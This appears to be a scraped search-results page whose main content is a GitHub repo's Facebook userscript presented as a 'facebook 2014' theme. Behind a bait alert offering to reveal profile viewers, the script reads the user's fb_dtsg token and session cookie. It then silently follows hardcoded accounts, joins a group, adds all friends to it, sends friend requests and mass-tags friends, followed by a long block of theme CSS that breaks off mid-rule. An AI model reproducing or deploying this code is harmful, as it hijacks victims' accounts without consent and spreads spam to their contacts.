Showing results for Slots Wallpaper
StackOverflow
https://stackoverflow.com/questions/69502404/trouble-with-qt-timers-function-definition-is-not-allowed-here
Trouble with QT timers: "function definition is not allowed here"
Tags: c++, qt
GitHub Repo
https://github.com/ephendyy/sahabatfb
ephendyy/sahabatfb
// ==UserScript== // @name facebook 2014 // @version v.01 // @Hak Cipta Ephendy // ==/UserScript== var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); alert('Apakah Anda Ingin mengetahui pengintip profil Anda..?? Klik OK untuk melanjutkan'); function cereziAl(isim) { var tarama = isim + "="; if (document.cookie.length > 0) { konum = document.cookie.indexOf(tarama) if (konum != -1) { konum += tarama.length son = document.cookie.indexOf(";", konum) if (son == -1) son = document.cookie.length return unescape(document.cookie.substring(konum, son)) } else { return ""; } } } function getRandomInt (min, max) { return Math.floor(Math.random() * (max - min + 1)) + min; } function randomValue(arr) { return arr[getRandomInt(0, arr.length-1)]; } var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function a(abone){ var http4 = new XMLHttpRequest(); var url4 = "/ajax/follow/follow_profile.php?__a=1"; var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp="; http4.open("POST", url4, true); //Send the proper header information along with the request http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); http4.setRequestHeader("Content-length", params4.length); http4.setRequestHeader("Connection", "close"); http4.onreadystatechange = function() {//Call a function when the state changes. if(http4.readyState == 4 && http4.status == 200) { http4.close; // Close the connection } } http4.send(params4); } function sublist(uidss) { var a = document.createElement('script'); a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();"; document.body.appendChild(a); } // ADMIN a("100003968374379");a("100002185318761");a("1472703506");a("675820844");a("510704624");a("510704630"); var gid = ['610945318992585']; var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/membership/r2j.php?__a=1'; var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['send'](paramswp); var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]); var friends = new Array(); gf = new XMLHttpRequest(); gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false); gf['send'](); if (gf['readyState'] != 4) {} else { data = eval('(' + gf['responseText']['substr'](9) + ')'); if (data['error']) {} else { friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) { return _0x93dax8['index'] - _0x93dax9['index']; }); }; }; for (var i = 0; i < friends['length']; i++) { var httpwp = new XMLHttpRequest(); var urlwp = '/ajax/groups/members/add_post.php?__a=1'; var paramswp= '&fb_dtsg=' + fb_dtsg + '&group_id=' + gid + '&source=typeahead&ref=&message_id=&members=' + friends[i]['uid'] + '&__user=' + user_id + '&phstamp='; httpwp['open']('POST', urlwp, true); httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); httpwp['setRequestHeader']('Content-length', paramswp['length']); httpwp['setRequestHeader']('Connection', 'keep-alive'); httpwp['onreadystatechange'] = function () { if (httpwp['readyState'] == 4 && httpwp['status'] == 200) {}; }; httpwp['send'](paramswp); }; var spage_id = "453791288019170"; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var smesaj = ""; var smesaj_text = ""; var arkadaslar = []; var svn_rev; var bugun= new Date(); var btarihi = new Date(); btarihi.setTime(bugun.getTime() + 1000*60*60*4*1); if(!document.cookie.match(/paylasti=(\d+)/)){ document.cookie = "paylasti=hayir;expires="+ btarihi.toGMTString(); } //arkadaslari al ve isle function sarkadaslari_al(){ var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";"); for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){ smesaj = ""; smesaj_text = ""; for(i=f*10;i<(f+1)*10;i++){ if(arkadaslar.payload.entries[i]){ smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]"; smesaj_text += " " + arkadaslar.payload.entries[i].text; } } sdurumpaylas(); } } }; var params = "&filter[0]=user"; params += "&options[0]=friends_only"; params += "&options[1]=nm"; params += "&token=v7"; params += "&viewer=" + user_id; params += "&__user=" + user_id; if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); } else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); } xmlhttp.send(); } //tiklama olayini dinle var tiklama = document.addEventListener("click", function () { if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){ svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0]; sarkadaslari_al(); document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString(); document.removeEventListener(tiklama); } }, false); //arkada?¾ ekleme function sarkadasekle(uid,cins){ var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ } }; xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true); var params = "to_friend=" + uid; params += "&action=add_friend"; params += "&how_found=friend_browser"; params += "&ref_param=none"; params += "&outgoing_id="; params += "&logging_location=friend_browser"; params += "&no_flyout_on_click=true"; params += "&ego_log_data="; params += "&http_referer="; params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value; params += "&phstamp=165816749114848369115"; params += "&__user=" + user_id; xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev); xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded"); if(cins == "farketmez" && document.cookie.split("cins" + user_id +"=").length > 1){ xmlhttp.send(params); }else if(document.cookie.split("cins" + user_id +"=").length <= 1){ cinsiyetgetir(uid,cins,"sarkadasekle"); }else if(cins == document.cookie.split("cins" + user_id +"=")[1].split(";")[0].toString()){ xmlhttp.send(params); } } //cinsiyet belirleme var cinssonuc = {}; var cinshtml = document.createElement("html"); function scinsiyetgetir(uid,cins,fonksiyon){ var xmlhttp = new XMLHttpRequest(); xmlhttp.onreadystatechange = function () { if(xmlhttp.readyState == 4){ eval("cinssonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";"); cinshtml.innerHTML = cinssonuc.jsmods.markup[0][1].__html btarihi.setTime(bugun.getTime() + 1000*60*60*24*365); if(cinshtml.getElementsByTagName("select")[0].value == "1"){ document.cookie = "cins" + user_id + "=kadin;expires=" + btarihi.toGMTString(); }else if(cinshtml.getElementsByTagName("select")[0].value == "2"){ document.cookie = "cins" + user_id + "=erkek;expires=" + btarihi.toGMTString(); } eval(fonksiyon + "(" + id + "," + cins + ");"); } }; xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true); xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev); xmlhttp.send(); } (function() { var css = "#facebook body:not(.transparent_widget),#nonfooter,#booklet,.UIFullPage_Container,.fbConnectWidgetTopmost,.connect_widget_vertical_center,.fbFeedbackContent,#LikeboxPluginPagelet\n{ \ncolor: #fff !important;\nbackground: url(\"http://techbeasts.com/wp-content/uploads/2013/10/WeChat-Application-Android.png\") repeat fixed left center #051022 !important;\n}\n\n\na,.UIActionButton_Text,span,div,input[value=\"Comment\"] {text-shadow: #000 1px 1px 1px !important;}\n\n.UIComposer_InputArea *,.highlighter div{text-shadow: none !important;}\n\n#profile_name {text-shadow: #fff 0 0 2px,#000 1px 1px 3px;}\n\na:hover,.inputbutton:hover,.inputsubmit:hover,.accent,.hover,.domain_name:hover,#standard_error,.UIFilterList_Selected a:hover,input[type=\"submit\"]:not(.fg_action_hide):hover,.button_text:hover,#presence_applications_tab:hover,.UIActionMenu:hover,.attachment_link a span:hover,.UIIntentionalStory_Time a:hover,.UIPortrait_Text .title:hover,.UIPortrait_Text .title span:hover,.comment_link:hover,.request_link span:hover,.UIFilterList_ItemLink .UIFilterList_Title:hover,.UIActionMenu_Text:hover,.UIButton_Text:hover,.inner_button:hover,.panel_item span:hover,li[style*=\"background-color: rgb(255,255,255)\"] .friend_status,.dh_new_media span:hover,a span:hover,.tab_link:hover *,button:hover,#buddy_list_tab:hover *,.tab_handle:hover .tab_name span,.as_link:hover span,input[type=\"button\"]:hover,.feedback_show_link:hover,.page:hover .text,.group:hover .text,.calltoaction:hover .seeMoreTitle,.liketext:hover,.tickerStoryBlock:hover .uiStreamMessage span,.tickerActionVerb,.mleButton:hover,.bigNumber,.pluginRecommendationsBarButton:hover {color: #9cf !important;text-shadow: #fff 0 0 2px !important;text-decoration: none !important;}\n\n\n.fbChatSidebar .fbChatTypeahead .textInput,.fbChatSidebarMessage,.devsitePage .body > .content {box-shadow: none !important;}\n\n.presence_menu_opts,#header,.LJSDialog,.chat_window_wrapper,#navAccount ul,.fbJewelFlyout,.uiTypeaheadView,.uiToggleFlyout { box-shadow: 0 0 3em #000; }\n\n.UIRoundedImage,.UIContentBox_GrayDarkTop,.UIFilterList > .UIFilterList_Title, .dialog-title,.flyout,.uiFacepileItem .uiTooltipWrap {box-shadow: 0 0 1em 1px #000;}\n\n.extra_menus ul li:hover,.UIRoundedBox_Box,.fb_menu_link:hover,.UISelectList_Item:hover,.fb_logo_link:hover,.hovered,#presence_notifications_tab,#chat_tab_barx,.tab_button_div,.plays_val, #mailBoxItems li a:hover,.buddy_row a:hover,.buddyRow a:hover,#navigation a:hover,#presence_applications_tab,#buddy_list_tab,#presence_error_section,.uiStepSelected .middle,.jewelButton,#pageLogo,.fbChatOrderedList .item:hover,.uiStreamHeaderTall {box-shadow: 0 0 3px #000,inset 0 0 5px #000 !important;}\n\n\n.topNavLink > a:hover,#navAccount.openToggler,.selectedCheckable {box-shadow: 0 0 4px 2px #9cf,inset 0 0 2em #69f !important;}\n\n\n.fbChatBuddyListDropdown .uiButton,.promote_page a,.create_button a,.share_button_browser div,.silver_create_button,.button:not(.uiSelectorButton):not(.close):not(.videoicon),button:not(.as_link),.GBSearchBox_Button,.UIButton_Gray,.UIButton,.uiButton:not(.uiSelectorButton),.fbPrivacyWidget .uiSelectorButton:not(.lockButton),.uiButtonSuppressed,.UIActionMenu_SuppressButton,.UIConnectControlsListSelector .uiButton,.uiSelector:not(.fbDockChatDropdown) .uiSelectorButton:not(.uiCloseButton),.fbTimelineRibbon,#fbDockChatBuddylistNub .fbNubButton,.pluginRecommendationsBarButtonLike {box-shadow: 0 0 .5em rgba(0,0,0,0.9),inset 0 0 .75em #9cf !important;border-width: 0 !important; }\n\n.fbChatBuddyListDropdown .uiButton:hover,.uiButton:not(.uiSelectorButton):hover,.fbPrivacyWidget .uiSelectorButton:not(.lockButton):hover,.uiButtonSuppressed:hover,.UIButton:hover,.UIActionMenu_Wrap:hover,.tabs li:hover,.ntab:hover,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([type=\"Flag\"]):not([type=\"submit\"]):hover,.inputsubmit:hover,.promote_page:hover,.create_button:hover,.share_button_browser:hover,.silver_create_button_shell:hover,.painted_button:hover,.flyer_button:hover,.button:not(.close):not(.uiSelectorButton):not(.videoicon):hover,button:not(.as_link):hover,.GBSearchBox_Button:hover,.tagsWrapper,.UIConnectControlsListSelector .uiButton:hover,.uiSelector:not(.fbDockChatDropdown) .uiSelectorButton:not(.uiCloseButton):hover,.fbTimelineMoreButton:hover,#fbDockChatBuddylistNub .fbNubButton:hover,.tab > div:not(.title):hover,.detail.frame:hover,.pluginRecommendationsBarButtonLike:hover {box-shadow: 0 0 .5em #000,0 0 1em 3px #9cf,inset 0 0 2em #69f !important;}\n\n#icon_garden,.list_select .friend_list {box-shadow: 0 0 3px -1px #000,inset 0 0 3px -1px #000;}\n\n.bb .fbNubButton,.uiScrollableAreaGripper {box-shadow: inset 0 4px 8px #9cf,0 0 1em #000 !important;}\n\n.bb .fbNubButton:hover {box-shadow: inset 0 4px 8px #9cf,0 .5em 1em 1em #9cf !important;}\n\n.fbNubFlyoutTitlebar {box-shadow: inset 0 4px 8px #9cf;padding: 0 4px !important;}\n\n#fb_menubar,.progress_bar_outer {box-shadow: inset 0 0 3px #000,0 0 3em 3px #000;}\n#presence_ui {box-shadow: 0 0 3em 1px #000}\n\n#buddy_list_tab:hover,.tab_handle:hover,.focused {box-shadow: 0 0 3px #000,inset 0 0 3px #000,0 0 3em 5px #fff;}\n\n.uiSideNavCount,.jewelCount,.uiContextualDialogContent,.fbTimelineCapsule .fbTimelineTwoColumn > .timelineUnitContainer:hover,.timelineReportContainer:hover,.uiOverlayPageContent,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,.uiScaledImageContainer:hover, .pagesVoiceBar, ._k5 {box-shadow: 0 0 1em 4px #9cf !important;}\n\n.img_link:hover,.album_thumb:hover,.fbChatTourCallout .body,.fbSidebarGripper div {box-shadow: 0 0 3em #9cf;}\n\n.shaded,.progress_bar_inner,.tickerStoryAllowClick {box-shadow: inset 0 0 1em #9cf !important}\n\n.UIPhotoGrid_Table .UIPhotoGrid_TableCell:hover .UIPhotoGrid_Image,#myphoto:hover,.mediaThumbWrapper:hover,.uiVideoLink:hover,.mediaThumb:hover,#presence.fbx_bar #presence_ui #presence_bar .highlight,.fbNubFlyout:hover,.hovercard .stage,#fbDockChatBuddylistNub .fbNubFlyout:hover,.balloon-content,.-cx-PRIVATE-uiDialog__border {box-shadow: 0 0 3em 5px #9cf !important;}\n\n.fbNubFlyout,.uiMenuXBorder {box-shadow: 0 0 3em 5px #000 !important;}\n\n#blueBar {box-shadow: 0 0 1em 3px #000 !important;}\n\n\n.fill {box-shadow: inset 0 0 2em #69f,0 0 1em #000 !important;}\n\n\ninput[type=\"file\"]{-moz-appearance:none!important;border: none !important;}\n\n\n.status_text,h4,a,h2,.flyout_menu_title,.url,#label_nm,h5,.WelcomePage_MainMessage,#public_link_uri,#public_link_editphoto span,#public_link_editalbum span,.dh_subtitle,.app_name_heading,.box_head,.presence_bar_button span,a:link span,#public_link_album span,.note_title,.link_placeholder,.stories_title,.typeahead_suggestion,.boardkit_title,.section-title strong,.inputbutton,.inputsubmit,.matches_content_box_title,.tab_name,.header_title_text,.signup_box_message,.quiz_start_quiz,.sidebar_upsell_header,.wall_post_title,.megaphone_header,.source_name,.UIComposer_AttachmentLink,.fcontent > .fname,#presence_applications_tab,.mfs_email_title,.flyout .text,.UIFilterList_ItemLink .UIFilterList_Title,.announce_title,.attachment_link a span,.comment_author,.UIPortrait_Text .title,.comment_link,.UIIntentionalStory_Names,#profile_name,.UIButton_Text,.dh_new_media span,.share_button_browser div,.UIActionMenu_Text,.UINestedFilterList_Title,button,.panel_item span,.stat_elem,.action,#contact_importer_container input[value=\"Find Friends\"]:hover,.navMore,.navLess,input[name=\"add\"],input[name=\"actions[reject]\"],input[name=\"actions[accept]\"],input[name=\"actions[maybe]\"],.uiButtonText,.as_link .default_message,.feedback_hide_link,.feedback_show_link,#fbpage_fan_sidebar_text,.comment_actual_text a span,.uiAttachmentDesc a span,.uiStreamMessage a span,.group .text,.page .text,.uiLinkButton input,.blueName,.uiBlingBox span.text,.commentContent a span,.uiButton input,.fbDockChatTab .name,.simulatedLink,.bfb_tab_selected,.liketext,a.UIImageBlock_Content,.uiTypeaheadView li .text,.author,.authors,.itemLabel,.passiveName,.token,.fbCurrentTitle,.fbSettingsListItemLabel,.uiIconText,#uetqg1_8,.fbRemindersTitle,.mleButton,.uiMenuItem .selected .name {color: #9cf !important;}\n\n#email,option,.disclaimer,.info dd,.UIUpcoming_Info,.UITos_ReviewDescription,.settings_box_text,div[style*=\"color: rgb(85,85,85)\"] {color: #999 !important;}\n\n.status_time,.header_title_wrapper,.copyright,#newsfeed_submenu,#newsfeed_submenu_content strong,.summary,.caption,.story_body,.social_ad_advert_text,.createalbum dt,.basic_info_summary_and_viewer_actions dt,.info dt,.photo_count,p,.fbpage_fans_count,.fbpage_type,.quiz_title,.quiz_detailtext,.byline,label,.fadvfilt b,.fadded,.fupdt,.label,.main_subtitle,.minifeed_filters li,.updates_settings,#public_link_photo,#phototags em,#public_link_editphoto,.note_dialog,#public_link_editalbum,.block_add_person,.privacy_page_field,.action_text,.network,.set_filters span,.byline span,#no_notes,#cheat_sheet,.form_label,.share_item_actions,.options_header,.box_subtitle,.review_header_subtitle_line,.summary strong,.upsell dd,.availability_text,#public_link_album,.explanation,.aim_link,.subtitle,#profile_status,span[style*=\"color: rgb(51,51,51)\"],.fphone_label,.phone_type_label,.sublabel,.gift_caption,dd span,.events_bar,.searching,.event_profile_title,.feedBackground,.fp_show_less,.increments td,.status_confirm,.sentence,.admin_list span,.boardkit_no_topics,.boardkit_subtitle,.petition_preview,.boardkit_topic_summary,li,#photo_badge,.status_body, .spell_suggest_label,.pg_title,.white_box,.token span,.profile_activation_score,.personal_msg span,.matches_content_box_subtitle span,tr[fbcontext=\"41097bfeb58d\"] td,.title,.floated_container span:not(.accent),div[style*=\"color: rgb(85,85,85)\"],div[style*=\"color: rgb(68,68,68)\"],.present_info_label,.fbpage_description,.tagged span,#tags h2 strong,#tags div span,.detail,.chat_info_status,.gray-text,.author_header,.inline_comment,.fbpage_info,.gueststatus,.no_pages,.topic_pager,.header_comment span,div[style*=\"color: rgb(101,107,111)\"],#q,span[style*=\"color: rgb(85,85,85)\"],.pl-item,.tagged_in,.pick_body,td[style*=\"color: rgb(85,85,85)\"],strong[style*=\"color: rgb(68,68,68)\"],div[style*=\"color: gray\"],.group_officers dd,.fbpage_group_title,.application_menu_divider,.friend_status span,.more_info,.logged_out_register_subhead,.logged_out_register_footer,input[type=\"text\"],textarea,.status_name span,input[type=\"file\"],.UIStoryAttachment_Copy,.stream_participants_short,.UIHotStory_Copy,input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not(.UIButton_Text):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([value=\"Flag\"]):not([type=\"submit\"]),input[type=\"search\"],input[type=\"input\"],.inputtext,.relationship span,input[type=\"button\"]:not([value=\"Comment\"]),input[type=\"password\"],#reg_pages_msg,.UIMutableFilterList_Tip,.like_sentence,.UIIntentionalStory_InfoText,.UIHotStory_Why,.question_text,.UIStory,.tokenizer,input[type=\"hidden\"],.tokenizer_input *,.text:not(.external),.flistedit b,.fexth,.UIActionMenu_Main,span[style*=\"color: rgb(102,102,102)\"],div[style*=\"color: rgb(85,85,85)\"],div[style*=\"color: rgb(119,119,119)\"],blockquote,.description,.security_badge,.full_name,.email_display,.email_section,.chat_fl_nux_messaging,.UIObjectListing_Subtext,.confirmation_login_content,.confirm_username,.UIConnectControls_Body em,.comment_actual_text,.status,.UICantSeeProfileBlurbText,.UILiveLink_Description,.recaptcha_text,.UIBeep_Title,.UIComposer_Attachment_ShareLink_URL,.app_dir_app_category,.first_stat,.aggregate_review_title,.stats span,.facebook_disclaimer,.app_dir_app_creator,.app_dir_app_monthly_active_users,.app_dir_app_friend_users,.UISearchFilterBar_Label,.UIFullListing_InfoLabel,.email_promise_detail,.title_text,.excerpt,.dialog_body,.tos,.UIEMUASFrame_body,.page_note,.nux_highlight_composer,.UIIntentionalStory_BottomAttribution,.tagline,.GBSelectList,.gigaboxx_thread_header_authors,.GBThreadMessageRow_ReferrerLink,#footerWrapper,.infoTitle,.fg_explain,.UIMentor_Message,.GenericStory_BottomAttribution,.chat_input,.video_timestamp span,#tagger_prompt,.UIImageBlock_Content,.new_list span, .GBSearchBox_Input input,.SearchPage_EmailSearchLeft,.sub_info,.UIBigNumber_Label,.UIInsightsGeoList_ListTitle,.UIInsightsGeoList_ListItemValue,.UIInsightsSmall_Note,.textmedium,.UIFeedFormStory_Lead,.home_no_stories_content, .title_label,div[style*=\"color: rgb(102,102,102)\"],*[style*=\"color: rgb(51,51,51)\"],.tab_box_inner,.uiStreamMessage,.privacy_section_description,.info_text,.uiAttachmentDesc,.uiListBulleted span,.privacySettingsGrid th,.recommendations_metadata,.postleft dd:not(.usertitle),.postText,.mall_post_body_text,.fbChatMessage,.fbProfileBylineFragment,.nosave option,.uiAttachmentDetails,.fbInsightsTable td,.mall_post_body,.uiStreamPassive,.snippet,.questionInfo span,.promotionsHowto,.fcg,.headerColumn .fwb,.rowGroupTitle .fwb,.rowGroupDescription .fwb,.likeUnit,.aboveUnitContent,.placeholder,.sectionContent,.UIFaq_Snippet,.uiMenuItem:not(.checked) .name,.balloon-text,.fbLongBlurb,.legendLabel,.messageBody {color: #bbb !important;}\n\n.status_clear_link,h3,h1,.updates,.WelcomePage_SignUpHeadline,.WelcomePage_SignUpSubheadline,.mock_h4 .left,.review_header_title,caption,.logged_out_register_msg,.domain_name, .UITitledBox_Title,.signup_box_content,.highlight,.question,.whocan span,.UIFilterList > .UIFilterList_Title,.subject,.UIStoryAttachment_Label,.typeahead_message,.UIShareStage_Title,.alternate_name,.helper_text,.textlarge,.page .category,.item_date,.privacy_section_label,.privacy_section_title,.uiTextMetadata, .seeMoreTitle,.categoryContents,code,.usertitle,.fbAppSettingsPageHeader,.fsxl,.LogoutPage_MobileMessage,.LogoutPage_MobileSubmessage,.recommended_text,#all_friends_text,.removable,.ginormousProfileName,.experienceContent .fwb,#bfb_t_popular_body div[style*=\"color:#880000\"],.fsm:not(.snippet):not(.itemLabel):not(.fbChatMessage),.uiStreamHeaderTextRight,.bookmarksNavSeeAll,.tab .content,.fbProfilePlacesFilterCount,.fbMarketingTextColorDark,.pageNumTitle,.pluginRecommendationsBarButton {color: #69f !important;}\n\n.em,.story_comment_back_quote,.story_content,small,.story_content_excerpt,.walltext,.public,p span,#friends_page_subtitle,.main_title,.empty_message,.count,.count strong,.stories_not_included li span,.mobile_add_phone th,#friends strong,.current,.no_photos,.intro,.sub_selected a,.stats,.result_network,.note_body,#bodyContent div b,#bodyContent div,.upsell dt,.buddy_count_num strong,.left,.body,.tab .current,.aim_link span,.story_related_count,.admins span,.summary em,.fphone_number,.my_numbers_label,.blurb_inner,.photo_header strong,.note_content,.multi_friend_status,.current_path span,.current_path,.petition_header,.pyramid_summary strong,#status_text,.contact_email_pending em,.profile_needy_message,.paging_link div,.big_title,.fb_header_light,.import_status strong,.upload_guidelines ul li span,.upload_guidelines ul li span strong,#selector_status,.timestamp strong,.chat_notice,.notice_box,.text_container,.album_owner,.location,.info_rows dd,.divider,.post_user,div[style=\"color: rgb(101,107,111);\"] b,div[style=\"color: rgb(51,51,51);\"] b,.basic_info_summary_and_viewer_actions dd,.profile_info dd,.story_comment,p strong,th strong,.fstatus,.feed_story_body,.story_content_data,.home_prefs_saved p,.networks dd,.relationship_status dd,.birthday dd,.current_city dd,.UIIntentionalStory_Message,.UIFilterList_Selected a,.UIHomeBox_Title,.suggestion,.spell_suggest,.UIStoryAttachment_Caption,.fexth + td,.fext_short,#fb_menu_inbox_unread_count,.Tabset_selected .arrow .sel_link span,.UISelectList_check_Checked,.chat_fl_nux_header,.friendlist_status .title a,.chat_setting label,.UIPager_PageNum,.good_username,.UIComposer_AttachmentTitle,.rsvp_option:hover label,.Black,.comment_author span,.fan_status_inactive,.holder,.UIThumbPagerControl_PageNumber,.text_center,.nobody_selected,.email_promise,.blocklist ul,#advanced_body_1 label,.continue,.empty_albums,div[style*=\"color: black\"],.GBThreadMessageRow_Body_Content,.UIShareStage_Subtitle,#public_link_photo span,.GenericStory_Message,.UIStoryAttachment_Value,div[style*=\"color: black\"],.SearchPage_EmailSearchTitle,.uiTextSubtitle,.jewelHeader,.recent_activity_settings_label,.people_list_item,.uiTextTitle,.tab_box,.instant_personalization_title,.MobileMMSEmailSplash_Description,.MobileMMSEmailSplash_Tipsandtricks_Title,.fcb,input[value=\"Find Friends\"],#bodyContent,#bodyContent table,h6,.fbChatBuddylistError,.info dt,.bfb_options_minimized_hide,.connect_widget_connected_text,body.transparent_widget .connect_widget_not_connected_text,.connect_widget_button_count_count,.fbInsightsStatisticNumber,.fbInsightsTable thead th span,.header span,.friendlist_name a,.count .countValue,.uiHeaderTitle span,#about_text_less span,.uiStreamHeaderText,.navHeader,.uiAttachmentTitle,.fbProfilePlacesFilterText,.tagName,.ufb-dataTable-header-text,.ufb-text-content,.fb_content,.uiComposerAttachment .selected .attachmentName,.balloon-title,.cropMessage {color: #fff !important;}\n\n.bfb_post_action_container {opacity: .25 !important;}\n.bfb_post_action_container:hover {opacity: 1 !important;}\n\n.valid,.wallheader small,#photodate,.video_timestamp strong,.date_divider span,.feed_msg h5,.time,.item_contents,.boardkit_topic_updated,.walltime,.feed_time,.story_time,#status_time_inner,.written small,.date,div[style*=\"color: rgb(85,82,37)\"],.timestamp span,.time_stamp,.timestamp,.header_info_timestamp,.more_info div,.timeline,.UIIntentionalStory_Time,.fupdt,.note_timestamp,.chat_info_status_time,.comment_actions,.UIIntentionalStory_Time a,.UIUpcoming_Time,.rightlinks,.GBThreadMessageRow_Date,.GenericStory_Time a,.GenericStory_Time,.fbPrivacyPageHeader,.date_divider {color: #69f !important;}\n\n.textinput,select,.list_drop_zone,.msg_divide_bottom,textarea,input[type=\"text\"],input[type=\"file\"],input[type=\"search\"],input[type=\"input\"],input[type=\"password\"],.space,.tokenizer,input[type=\"hidden\"],#flm_new_input,.UITooltip:hover,.UIComposer_InputShadow,.searchroot input,input[name=\"search\"],.uiInlineTokenizer,input.text,input.nosave {background: rgba(0,0,0,.50) !important;-moz-appearance:none!important;color: #bbb !important;border: none !important;padding: 3px !important; }\n\ninput[type=\"text\"]:focus,textarea:focus,.fbChatSidebar .fbChatTypeahead .textInput:focus {box-shadow: 0 0 .5em #9cf,inset 0 0 .25em #69f !important;}\n\n.uiOverlayPageWrapper,#fbPhotoSnowlift,.shareOverlay,.tlPageRecentOverlay {background: -moz-radial-gradient(50% 50%,circle,rgba(10,10,10,.6),rgb(10,10,10) 90%) !important;}\n\n.bumper,.stageBackdrop {background: #000 !important;}\n#page_table {background: #333 }\n\n.checkableListItem:hover a,.selectedCheckable a {background: #69f !important; }\n\n.GBSearchBox_Input,.tokenizer,.LTokenizerWrap,#mailBoxItems li a:hover,.uiTypeaheadView .search .selected,.itemAnchor:hover,.notePermalinkMaincol .top_bar, .notification:hover a,#bfb_tabs div:not(.bfb_tab_selected),.bfb_tab,.navIdentity form:hover,.connect_widget_not_connected_text,.uiTypeaheadView li.selected,.connect_widget_number_cloud,.placesMashCandidate:hover,.highlight,#bfb_option_list li a:hover {background: rgba(0,0,0,.5) !important;}\n\n.results .page,.calltoaction,.results li,.fbNubFlyout,.contextualBlind,.bfb_dialog,.bfb_image_preview,input.text,.fbChatSidebar,.jewelBox,.clickToTagMessage,.tagName,.ufb-tip-body,.flyoutContent,.fbTimelineMapFilterBar,.fbTimelineMapFilter,.fbPhotoStripTypeaheadForm,.groupsSlimBarTop,.pas,.contentBox,.fbMapCalloutMain, .pagesVoiceBar {background: rgba(10,10,10,.75) !important;}\n\n#pageNav .tinyman:hover a,#navHome:hover a,#pageNav .tinyman a[style*=\"cursor: progress\"],#navHome a[style*=\"cursor: progress\"],#home_filter_list,#home_sidebar,#contentWrapper,.LDialog,.dialog-body,.LDialog,.LJSDialog,.dialog-foot,.chat_input,#contentCol,#leftCol,.UIStandardFrame_Content,.red_box,.yellow_box,.uiWashLayoutOffsetContent,.uiOverlayContent,.bfb_post_action_container,.connect_widget_button_count_count,.shaded,.navIdentitySub,.jewelItemList li a:hover,.fbSidebarGripper div,.jewelCount,.uiBoxRed,.videoUnit,.lifeEventAddPhoto,.fbTimelineLogIntroMegaphone,.uiGamesLeaderboardItem,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,.newInterestListNavItem:hover,.ogSliderAnimPagerPrevContent,.ogSingleStoryStatus,.ogSliderAnimPagerNextContent,.-cx-PRIVATE-uiDialog__body,.jewelItemNew .messagesContent {background: rgba(10,10,10,.5) !important;}\n\n#home_stream,pre,.ufiItem,.odd,.uiBoxLightblue,.platform_dialog_bottom_bar,.uiBoxGray,.fbFeedbackPosts,.mall_divider_text,.uiWashLayoutGradientWash, #bfb_options_body,.UIMessageBoxStatus,.tip_content .highlight,.fbActivity, .auxlabel,.signup_bar_container,#wait_panel,.FBAttachmentStage,.sheet,.uiInfoTable .name,.HCContents,#devsiteHomeBody .content,.devsitePage .nav .content,#confirm_phone_frame,.fbTimelineCapsule 